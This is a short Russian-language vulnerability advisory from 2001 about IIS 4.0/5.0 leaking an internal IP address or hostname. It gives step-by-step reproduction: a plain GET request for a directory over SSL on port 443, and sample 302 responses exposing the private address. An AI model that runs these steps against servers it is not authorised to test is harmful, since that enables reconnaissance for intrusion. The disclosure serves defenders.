Раскрытие внутреннего IP в IIS 4.0,5.0

Дата публикации:
09.08.2001
Дата изменения:
17.10.2006
Всего просмотров:
1202
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

e-Synergies обнаружили и исследовали уязвимость в Internet Information Server. Успешная эксплуатация этой уязвимости может показать критическую внутреннюю информацию типа внутреннего IP адреса или внутреннего имени хоста, соединяясь вручную с TCP/443 портом (SSL) ( например используя Perl (SSLeay)).

Эксплоит:

1-Просматриваем интернет сайт, используя SSL броузер и находим любой каталог.

К примеру: https: // www.target.com/images/icon.gif

2-Используем совместимый SSL Perl сценарий, выполните следующую команду:

GET /images HTTP/1.0 (ели не получится попробуйте HTTP/1.1)

3- Результат должен выглядеть следующим образом:



HTTP/1.1 302 Object Moved

Location: https://192.168.1.10/images/

Server: Microsoft-IIS/4.0

Content-Type: text/html

Content-Length: xxx

Или

HTTP/1.1 302 Object Moved

Location: https://netbiosname/images/

Server: Microsoft-IIS/4.0

Content-Type: text/html

Content-Length: xxx
 


или введите имя

CAPTCHA